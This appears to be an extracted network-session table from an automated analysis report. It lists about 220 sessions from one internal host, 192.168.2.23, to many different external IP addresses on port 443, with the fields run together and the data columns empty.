                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16572192.168.2.235894267.14.126.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16573192.168.2.235821452.227.197.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16574192.168.2.2352032203.175.82.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16575192.168.2.2360828213.181.15.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16576192.168.2.235296619.140.80.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16577192.168.2.2345106218.193.53.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16578192.168.2.2344166210.67.66.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16579192.168.2.235302678.91.126.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16580192.168.2.2338046164.192.77.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16581192.168.2.235062645.88.69.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16582192.168.2.2343932182.106.186.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16583192.168.2.2359526132.15.217.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16584192.168.2.2334410141.88.44.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16585192.168.2.2338250144.129.131.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16586192.168.2.234520443.151.120.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16587192.168.2.2346120117.149.221.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16588192.168.2.234212220.48.64.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16589192.168.2.2335216115.240.95.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16590192.168.2.2342240182.101.71.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16591192.168.2.23541244.11.55.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16592192.168.2.235900473.82.114.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16593192.168.2.235767467.95.114.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16594192.168.2.2357284213.71.209.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16595192.168.2.235861661.82.234.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16596192.168.2.234738027.51.142.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16597192.168.2.2351210201.179.203.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16598192.168.2.2335198154.192.60.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16599192.168.2.2336832222.66.84.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16600192.168.2.2343848222.30.237.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16601192.168.2.235586083.51.192.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16602192.168.2.2360828100.56.215.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16603192.168.2.233655490.10.208.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16604192.168.2.2339088219.116.112.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16605192.168.2.2351838153.152.216.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16606192.168.2.233906414.79.210.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16607192.168.2.2336982173.6.251.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16608192.168.2.23572461.195.234.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16609192.168.2.2345400197.213.241.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16610192.168.2.2333116150.179.184.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16611192.168.2.2359546117.198.60.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16612192.168.2.234612614.103.124.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16613192.168.2.2359828174.95.243.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16614192.168.2.2337004102.226.153.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16615192.168.2.233720677.91.141.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16616192.168.2.2346276166.73.58.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16617192.168.2.2357852132.30.139.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16618192.168.2.2347456139.24.176.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16619192.168.2.235099290.10.220.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16620192.168.2.2347630151.87.109.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16621192.168.2.2354714216.218.188.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16622192.168.2.2340754152.202.45.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16623192.168.2.2355906189.1.226.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16624192.168.2.234172212.52.215.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16625192.168.2.2352754179.111.22.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16626192.168.2.2335088171.91.164.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16627192.168.2.2359644168.179.239.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16628192.168.2.23524688.243.234.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16629192.168.2.234366850.88.175.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16630192.168.2.234214880.17.128.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16631192.168.2.2352270134.131.93.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16632192.168.2.2332810192.233.23.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16633192.168.2.2359060182.108.188.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16634192.168.2.233554435.123.55.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16635192.168.2.2334248222.85.33.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16636192.168.2.2335008192.62.111.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16637192.168.2.233679088.156.239.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16638192.168.2.2350174128.252.23.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16639192.168.2.2343174216.13.134.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16640192.168.2.2348368220.185.9.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16641192.168.2.2340944185.221.158.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16642192.168.2.2360132140.194.186.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16643192.168.2.2354408205.238.189.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16644192.168.2.235763037.39.191.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16645192.168.2.2338104208.131.5.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16646192.168.2.2359296103.27.230.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16647192.168.2.2343914186.211.33.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16648192.168.2.2347156109.174.231.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16649192.168.2.2351152170.17.214.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16650192.168.2.2355862150.116.126.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16651192.168.2.2353950141.6.49.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16652192.168.2.233280836.180.227.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16653192.168.2.2352188176.24.47.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16654192.168.2.235706632.174.110.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16655192.168.2.233987439.151.109.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16656192.168.2.2350710106.157.115.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16657192.168.2.2341766152.18.74.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16658192.168.2.2360438102.178.36.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16659192.168.2.2340870145.211.206.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16660192.168.2.235942454.48.211.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16661192.168.2.2349844145.98.146.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16662192.168.2.235328092.228.63.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16663192.168.2.2335486196.119.209.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16664192.168.2.234983027.24.33.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16665192.168.2.235240249.30.203.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16666192.168.2.2349982190.169.50.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16667192.168.2.2355366172.74.80.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16668192.168.2.234678264.120.188.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16669192.168.2.2341280135.63.175.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16670192.168.2.2349590123.142.87.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16671192.168.2.2343048166.196.166.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16672192.168.2.2359298102.51.79.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16673192.168.2.2337730219.192.109.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16674192.168.2.2334026157.74.92.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16675192.168.2.2360532118.215.196.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16676192.168.2.2339206209.87.79.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16677192.168.2.2357992186.247.126.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16678192.168.2.2336452173.186.25.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16679192.168.2.2360816203.102.58.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16680192.168.2.23403161.18.187.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16681192.168.2.236045899.51.120.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16682192.168.2.2347222216.160.29.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16683192.168.2.2339670201.140.150.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16684192.168.2.233936225.13.191.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16685192.168.2.2357900182.154.100.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16686192.168.2.235938079.1.240.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16687192.168.2.235224690.127.18.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16688192.168.2.235411288.227.73.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16689192.168.2.233530258.180.253.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16690192.168.2.2348496106.234.38.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16691192.168.2.2353570147.244.126.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16692192.168.2.233310034.101.24.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16693192.168.2.2357938146.80.53.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16694192.168.2.2347178178.170.1.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16695192.168.2.2350448139.17.164.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16696192.168.2.2334312212.38.76.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16697192.168.2.233786664.185.198.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16698192.168.2.2359750170.52.45.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16699192.168.2.2360858105.51.225.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16700192.168.2.235202218.111.203.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16701192.168.2.2339120199.101.157.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16702192.168.2.2355088137.180.10.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16703192.168.2.2340426100.216.134.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16704192.168.2.233682638.142.249.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16705192.168.2.235255889.107.220.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16706192.168.2.236025864.95.73.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16707192.168.2.235896845.170.19.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16708192.168.2.236019465.102.68.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16709192.168.2.233382285.190.69.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16710192.168.2.2336234152.47.187.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16711192.168.2.23554045.93.5.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16712192.168.2.233904268.214.226.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16713192.168.2.2360138194.191.232.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16714192.168.2.235069699.183.99.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16715192.168.2.2343060145.82.76.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16716192.168.2.234835693.49.204.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16717192.168.2.2352844210.94.247.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16718192.168.2.234540234.91.154.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16719192.168.2.235577642.81.104.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16720192.168.2.233820618.214.81.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16721192.168.2.235631232.166.158.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16722192.168.2.2357396108.133.177.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16723192.168.2.234207671.200.38.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16724192.168.2.2352046177.229.170.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16725192.168.2.233820084.90.80.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16726192.168.2.235561681.238.46.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16727192.168.2.2338682164.222.71.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16728192.168.2.2349480165.228.115.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16729192.168.2.2353154136.112.151.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16730192.168.2.2343612163.62.192.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16731192.168.2.23606588.57.224.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16732192.168.2.2359842222.179.42.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16733192.168.2.2357140123.184.183.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16734192.168.2.235812277.66.9.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16735192.168.2.2359768211.50.88.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16736192.168.2.2358352141.14.238.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16737192.168.2.2337822171.199.50.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16738192.168.2.2355222157.47.24.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16739192.168.2.2344228176.219.144.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16740192.168.2.2346572146.4.242.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16741192.168.2.2344990193.250.60.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16742192.168.2.2353094164.232.30.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16743192.168.2.2341778129.90.164.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16744192.168.2.234658666.104.106.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16745192.168.2.2343196220.0.107.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16746192.168.2.234431888.252.150.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16747192.168.2.233338237.100.85.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16748192.168.2.234927647.108.94.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16749192.168.2.235325673.43.228.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16750192.168.2.235085474.224.122.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16751192.168.2.2335158185.142.235.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16752192.168.2.2353898169.222.27.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16753192.168.2.2351008145.128.243.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16754192.168.2.2349864158.33.234.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16755192.168.2.234064277.122.76.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16756192.168.2.234606019.237.107.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16757192.168.2.2356074202.156.142.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16758192.168.2.2341786133.153.153.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16759192.168.2.23463485.226.182.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16760192.168.2.2358170165.112.139.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16761192.168.2.2336494167.92.135.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16762192.168.2.235122427.28.223.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16763192.168.2.2355524124.252.112.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16764192.168.2.2344286152.185.56.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16765192.168.2.2357770110.36.172.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16766192.168.2.2347498160.98.136.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16767192.168.2.2346740190.216.81.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16768192.168.2.2358360153.228.99.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16769192.168.2.2343498106.158.238.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16770192.168.2.233312858.141.147.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16771192.168.2.2339668130.133.105.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16772192.168.2.2352130183.239.161.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16773192.168.2.235135045.73.17.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16774192.168.2.2333640174.213.169.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16775192.168.2.235653885.59.174.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16776192.168.2.234574045.110.206.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16777192.168.2.235833285.129.183.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16778192.168.2.234232646.83.31.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16779192.168.2.2337436175.18.164.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16780192.168.2.2358246126.87.34.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16781192.168.2.2338834110.113.59.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16782192.168.2.2351418128.43.39.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16783192.168.2.234176843.119.251.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16784192.168.2.234805274.82.32.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16785192.168.2.2352770138.201.87.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16786192.168.2.2345166114.235.185.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16787192.168.2.233741043.111.224.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16788192.168.2.2342656166.63.175.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16789192.168.2.2337832219.33.107.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16790192.168.2.235295662.130.48.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16791192.168.2.234042059.22.104.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16792192.168.2.2352150183.7.182.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16793192.168.2.234731448.36.207.204443
